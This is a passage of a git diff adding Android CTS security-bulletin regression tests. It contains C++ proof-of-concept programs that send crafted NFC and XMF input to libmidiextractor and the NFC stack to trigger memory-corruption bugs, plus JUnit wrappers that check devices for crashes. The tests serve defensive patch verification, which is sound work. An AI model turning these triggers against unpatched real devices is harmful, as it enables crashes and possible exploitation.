RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */ + RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */ + RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV + */ + + RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */ + RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */ + RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */ +}; + +static void *(*real_GKI_getbuf)(uint16_t size) = nullptr; +static void (*real_GKI_freebuf)(void *ptr) = nullptr; + +void init(void) { + real_GKI_getbuf = (void *(*)(uint16_t))dlsym(RTLD_NEXT, "_Z10GKI_getbuft"); + if (!real_GKI_getbuf) { + return; + } + + real_GKI_freebuf = (void (*)(void *))dlsym(RTLD_NEXT, "_Z11GKI_freebufPv"); + if (!real_GKI_freebuf) { + return; + } + + kIsInitialized = true; +} + +void *GKI_getbuf(uint16_t size) { + if (!kIsInitialized) { + init(); + } + return malloc(size); +} + +void GKI_freebuf(void *ptr) { + if (!kIsInitialized) { + init(); + } + free(ptr); +} + +int main() { + tRW_I93_CB *p_i93 = &rw_cb.tcb.i93; + + GKI_init(); + rw_init(); + + uint8_t p_uid = 1; + if (rw_i93_select(&p_uid) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + nfc_cb.quick_timer_queue.p_first = (TIMER_LIST_ENT *)malloc(16); + tNFC_CONN_EVT event = NFC_DATA_CEVT; + p_i93->state = RW_I93_STATE_UPDATE_NDEF; + p_i93->sub_state = RW_I93_SUBSTATE_UPDATE_LEN; + p_i93->block_size = 30; + p_i93->rw_length = 1; + + enable_selective_overload = ENABLE_ALL; + tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN)); + if (!p_data) { + free(nfc_cb.quick_timer_queue.p_first); + return EXIT_FAILURE; + } + + p_data->data.p_data = (NFC_HDR *)GKI_getbuf(sizeof(NFC_HDR)); + if (!(p_data->data.p_data)) { + free(p_data); + free(nfc_cb.quick_timer_queue.p_first); + return EXIT_FAILURE; + } + enable_selective_overload = ENABLE_NONE; + + (p_data->data.p_data)->len = 10; + p_data->data.p_data->offset = 0; + p_data->status = NFC_STATUS_OK; + + p_cb->p_cback(0, event, p_data); + + free(p_data); + free(nfc_cb.quick_timer_queue.p_first); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/Android.bp new file mode 100644 index 00000000000..9f254e33199 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/Android.bp @@ -0,0 +1,41 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2020-0381", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + include_dirs: [ + "frameworks/av/media/libmedia/include/android", + "frameworks/av/media/libmedia/include", + "frameworks/av/media/libstagefright/foundation/include", + "frameworks/av/media/libstagefright/foundation/include/media/stagefright/foundation", + "frameworks/av/media/libstagefright/include", + "frameworks/av/media/libstagefright/include/media/stagefright", + ], + shared_libs: [ + "libutils", + "libmediandk", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ] +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/poc.cpp new file mode 100644 index 00000000000..43da25d3c3e --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0381/poc.cpp @@ -0,0 +1,129 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <IMediaExtractor.h> +#include <dlfcn.h> +#include <signal.h> +#include <stdlib.h> +#include <fcntl.h> + +#include "../includes/common.h" +#include "../includes/memutils.h" + +#if _32_BIT +#define LIBNAME "/system/lib/extractors/libmidiextractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib/extractors/libmidiextractor.so" +#elif _64_BIT +#define LIBNAME "/system/lib64/extractors/libmidiextractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib64/extractors/libmidiextractor.so" +#endif + +char enable_selective_overload = ENABLE_NONE; + +using namespace android; + +class XMFDataSource : public DataSource { +public: + int mFdData; + int mFdInfo; + XMFDataSource(int fdData, int fdInfo) { + mFdData = fdData; + mFdInfo = fdInfo; + } + + ~XMFDataSource() = default; + + virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data, + size_t size) { + uint32_t infoOffset, infoSize; + read(mFdInfo, &infoSize, sizeof(int32_t)); + read(mFdInfo, &infoOffset, sizeof(int32_t)); + lseek(mFdData, infoOffset, SEEK_SET); + read(mFdData, data, infoSize); + return size; + } + + virtual status_t getSize(off64_t *size) { + *size = 0x10000; + return 0; + } + virtual status_t initCheck() const { return 0; } +}; + +void close_resources(int fdData, int fdInfo, void *libHandle) { + if (fdData >= 0) { + ::close(fdData); + } + if (fdInfo >= 0) { + ::close(fdInfo); + } + if (libHandle) { + dlclose(libHandle); + } +} + +int main(int argc, char **argv) { + if (argc < 3) { + return EXIT_FAILURE; + } + enable_selective_overload = ENABLE_ALL; + void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + return EXIT_FAILURE; + } + } + + GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF"); + if (!getDef) { + dlclose(libHandle); + return EXIT_FAILURE; + } + + int fdData = open(argv[1], O_RDONLY); + if (fdData < 0) { + dlclose(libHandle); + return EXIT_FAILURE; + } + int fdInfo = open(argv[2], O_RDONLY); + if (fdInfo < 0) { + close_resources(fdData, fdInfo, libHandle); + return EXIT_FAILURE; + } + + sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo); + if (!dataSource) { + close_resources(fdData, fdInfo, libHandle); + return EXIT_FAILURE; + } + + void *meta = nullptr; + FreeMetaFunc freeMeta = nullptr; + + float confidence = 0.0f; + if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) { + getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta); + } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) { + getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta); + } + + close_resources(fdData, fdInfo, libHandle); + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/Android.bp new file mode 100644 index 00000000000..5d003453f3e --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/Android.bp @@ -0,0 +1,41 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2020-0384", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + include_dirs: [ + "frameworks/av/media/libmedia/include/android", + "frameworks/av/media/libmedia/include", + "frameworks/av/media/libstagefright/foundation/include", + "frameworks/av/media/libstagefright/foundation/include/media/stagefright/foundation", + "frameworks/av/media/libstagefright/include", + "frameworks/av/media/libstagefright/include/media/stagefright", + ], + shared_libs: [ + "libutils", + "libmediandk", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ] +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp new file mode 100644 index 00000000000..43da25d3c3e --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0384/poc.cpp @@ -0,0 +1,129 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <IMediaExtractor.h> +#include <dlfcn.h> +#include <signal.h> +#include <stdlib.h> +#include <fcntl.h> + +#include "../includes/common.h" +#include "../includes/memutils.h" + +#if _32_BIT +#define LIBNAME "/system/lib/extractors/libmidiextractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib/extractors/libmidiextractor.so" +#elif _64_BIT +#define LIBNAME "/system/lib64/extractors/libmidiextractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib64/extractors/libmidiextractor.so" +#endif + +char enable_selective_overload = ENABLE_NONE; + +using namespace android; + +class XMFDataSource : public DataSource { +public: + int mFdData; + int mFdInfo; + XMFDataSource(int fdData, int fdInfo) { + mFdData = fdData; + mFdInfo = fdInfo; + } + + ~XMFDataSource() = default; + + virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data, + size_t size) { + uint32_t infoOffset, infoSize; + read(mFdInfo, &infoSize, sizeof(int32_t)); + read(mFdInfo, &infoOffset, sizeof(int32_t)); + lseek(mFdData, infoOffset, SEEK_SET); + read(mFdData, data, infoSize); + return size; + } + + virtual status_t getSize(off64_t *size) { + *size = 0x10000; + return 0; + } + virtual status_t initCheck() const { return 0; } +}; + +void close_resources(int fdData, int fdInfo, void *libHandle) { + if (fdData >= 0) { + ::close(fdData); + } + if (fdInfo >= 0) { + ::close(fdInfo); + } + if (libHandle) { + dlclose(libHandle); + } +} + +int main(int argc, char **argv) { + if (argc < 3) { + return EXIT_FAILURE; + } + enable_selective_overload = ENABLE_ALL; + void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + return EXIT_FAILURE; + } + } + + GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF"); + if (!getDef) { + dlclose(libHandle); + return EXIT_FAILURE; + } + + int fdData = open(argv[1], O_RDONLY); + if (fdData < 0) { + dlclose(libHandle); + return EXIT_FAILURE; + } + int fdInfo = open(argv[2], O_RDONLY); + if (fdInfo < 0) { + close_resources(fdData, fdInfo, libHandle); + return EXIT_FAILURE; + } + + sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo); + if (!dataSource) { + close_resources(fdData, fdInfo, libHandle); + return EXIT_FAILURE; + } + + void *meta = nullptr; + FreeMetaFunc freeMeta = nullptr; + + float confidence = 0.0f; + if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) { + getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta); + } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) { + getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta); + } + + close_resources(fdData, fdInfo, libHandle); + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/Android.bp new file mode 100644 index 00000000000..5a32f57234e --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/Android.bp @@ -0,0 +1,41 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2020-0385", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + include_dirs: [ + "frameworks/av/media/libmedia/include/android", + "frameworks/av/media/libmedia/include", + "frameworks/av/media/libstagefright/foundation/include", + "frameworks/av/media/libstagefright/foundation/include/media/stagefright/foundation", + "frameworks/av/media/libstagefright/include", + "frameworks/av/media/libstagefright/include/media/stagefright", + ], + shared_libs: [ + "libutils", + "libmediandk", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ] +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/poc.cpp new file mode 100644 index 00000000000..43da25d3c3e --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0385/poc.cpp @@ -0,0 +1,129 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <IMediaExtractor.h> +#include <dlfcn.h> +#include <signal.h> +#include <stdlib.h> +#include <fcntl.h> + +#include "../includes/common.h" +#include "../includes/memutils.h" + +#if _32_BIT +#define LIBNAME "/system/lib/extractors/libmidiextractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib/extractors/libmidiextractor.so" +#elif _64_BIT +#define LIBNAME "/system/lib64/extractors/libmidiextractor.so" +#define LIBNAME_APEX \ + "/apex/com.android.media/lib64/extractors/libmidiextractor.so" +#endif + +char enable_selective_overload = ENABLE_NONE; + +using namespace android; + +class XMFDataSource : public DataSource { +public: + int mFdData; + int mFdInfo; + XMFDataSource(int fdData, int fdInfo) { + mFdData = fdData; + mFdInfo = fdInfo; + } + + ~XMFDataSource() = default; + + virtual ssize_t readAt(off64_t offset __attribute__((unused)), void *data, + size_t size) { + uint32_t infoOffset, infoSize; + read(mFdInfo, &infoSize, sizeof(int32_t)); + read(mFdInfo, &infoOffset, sizeof(int32_t)); + lseek(mFdData, infoOffset, SEEK_SET); + read(mFdData, data, infoSize); + return size; + } + + virtual status_t getSize(off64_t *size) { + *size = 0x10000; + return 0; + } + virtual status_t initCheck() const { return 0; } +}; + +void close_resources(int fdData, int fdInfo, void *libHandle) { + if (fdData >= 0) { + ::close(fdData); + } + if (fdInfo >= 0) { + ::close(fdInfo); + } + if (libHandle) { + dlclose(libHandle); + } +} + +int main(int argc, char **argv) { + if (argc < 3) { + return EXIT_FAILURE; + } + enable_selective_overload = ENABLE_ALL; + void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + return EXIT_FAILURE; + } + } + + GetExtractorDef getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF"); + if (!getDef) { + dlclose(libHandle); + return EXIT_FAILURE; + } + + int fdData = open(argv[1], O_RDONLY); + if (fdData < 0) { + dlclose(libHandle); + return EXIT_FAILURE; + } + int fdInfo = open(argv[2], O_RDONLY); + if (fdInfo < 0) { + close_resources(fdData, fdInfo, libHandle); + return EXIT_FAILURE; + } + + sp<DataSource> dataSource = (sp<DataSource>)new XMFDataSource(fdData, fdInfo); + if (!dataSource) { + close_resources(fdData, fdInfo, libHandle); + return EXIT_FAILURE; + } + + void *meta = nullptr; + FreeMetaFunc freeMeta = nullptr; + + float confidence = 0.0f; + if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) { + getDef().u.v2.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta); + } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) { + getDef().u.v3.sniff(dataSource->wrap(), &confidence, &meta, &freeMeta); + } + + close_resources(fdData, fdInfo, libHandle); + enable_selective_overload = ENABLE_NONE; + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0684.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0684.java new file mode 100644 index 00000000000..4dd4b39acd1 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0684.java @@ -0,0 +1,38 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2017_0684 extends SecurityTestCase { + + /** + * b/35421151 + * Vulnerability Behaviour: SIGSEGV in media.codec + */ + @SecurityTest(minPatchLevel = "2017-07") + @Test + public void testPocCVE_2017_0684() throws Exception { + pocPusher.only32(); + String errPattern[] = {"media\\.codec", "omx@\\d+?\\.\\d+?-service"}; + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2017-0684", null, getDevice(), + errPattern); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0726.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0726.java new file mode 100644 index 00000000000..5a17589a504 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2017_0726.java @@ -0,0 +1,38 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2017_0726 extends SecurityTestCase { + + /** + * b/36389123 + * Vulnerability Behaviour: EXIT_VULNERABLE (113) + */ + @SecurityTest(minPatchLevel = "2017-08") + @Test + public void testPocCVE_2017_0726() throws Exception { + pocPusher.only64(); + String inputFiles[] = {"cve_2017_0726.mp4"}; + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2017-0726", + AdbUtils.TMP_PATH + inputFiles[0], inputFiles, AdbUtils.TMP_PATH, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2115.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2115.java new file mode 100644 index 00000000000..38c8be06e69 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2115.java @@ -0,0 +1,37 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import org.junit.Test; +import org.junit.runner.RunWith; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2019_2115 extends SecurityTestCase { + + /** + * b/129768470 + * Vulnerability Behaviour: EXIT_VULNERABLE (113) + */ + @SecurityTest(minPatchLevel = "2019-09") + @Test + public void testPocCVE_2019_2115() throws Exception { + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2115", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0461.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java index 81100e60a4b..db98e2858b0 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0461.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java @@ -16,31 +16,24 @@ package android.security.cts; +import com.android.tradefed.device.ITestDevice; + import android.platform.test.annotations.SecurityTest; import org.junit.Test; import org.junit.runner.RunWith; import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; -import static org.junit.Assume.assumeTrue; -import static org.junit.Assume.assumeThat; -import static org.hamcrest.CoreMatchers.equalTo; -import static org.junit.Assert.*; - @RunWith(DeviceJUnit4ClassRunner.class) -public class CVE_2020_0461 extends SecurityTestCase { +public class CVE_2019_2135 extends SecurityTestCase { /** - * b/162741784 + * b/125900276 + * Vulnerability Behaviour: SIGSEGV in self */ + @SecurityTest(minPatchLevel = "2019-08") @Test - @SecurityTest(minPatchLevel = "2020-12") - public void testPocCVE_2020_0461() throws Exception { - assumeTrue(containsDriver(getDevice(), - "/sys/devices/system/cpu/vulnerabilities/meltdown")); - String meltdown = AdbUtils.runCommandLine( - "cat /sys/devices/system/cpu/vulnerabilities/meltdown", getDevice()); - assertFalse(meltdown.startsWith("Vulnerable")); - assertTrue(meltdown.startsWith("Not affected") || - meltdown.startsWith("Mitigation")); + public void testPocCVE_2019_2135() throws Exception { + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE_2019_2135", null, getDevice()); } } diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java new file mode 100644 index 00000000000..4e0a4a6e754 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java @@ -0,0 +1,38 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0037 extends SecurityTestCase { + + /** + * b/143106535 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2020-03") + @Test + public void testPocCVE_2020_0037() throws Exception { + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0037", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java new file mode 100644 index 00000000000..6759c30caf3 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java @@ -0,0 +1,38 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0038 extends SecurityTestCase { + + /** + * b/143109193 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2020-03") + @Test + public void testPocCVE_2020_0038() throws Exception { + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0038", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java new file mode 100644 index 00000000000..f0f3323f20c --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java @@ -0,0 +1,38 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.device.ITestDevice; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0039 extends SecurityTestCase { + + /** + * b/143155861 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2020-03") + @Test + public void testPocCVE_2020_0039() throws Exception { + pocPusher.only64(); + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0039", null, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0381.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0381.java new file mode 100644 index 00000000000..2d5237a7186 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0381.java @@ -0,0 +1,43 @@ +/** + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.platform.test.annotations.SecurityTest; +import org.junit.Test; +import org.junit.runner.RunWith; +import com.android.tradefed.testtype.DeviceJUnit4ClassRunner; +import com.android.tradefed.device.ITestDevice; + +import static org.junit.Assume.*; + +@RunWith(DeviceJUnit4ClassRunner.class) +public class CVE_2020_0381 extends SecurityTestCase { + + /** + * b/150159669 + * Vulnerability Behaviour: SIGSEGV in self + */ + @SecurityTest(minPatchLevel = "2020-09") + @Test + public void testPocCVE_2020_0381() throws Exception { + assumeFalse(moduleIsPlayManaged("com.google.android.media")); + String inputFiles[] = {"cve_2020_0381.xmf", "cve_2020_0381.info"}; + AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0381", + AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1], + inputFiles, AdbUtils.TMP_PATH, getDevice()); + } +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0384.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0384.java new file mode 100644 index 00000000000..2f7b5d90eb7 --- /dev/null +++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0384.java @@ -0,0 +1,43 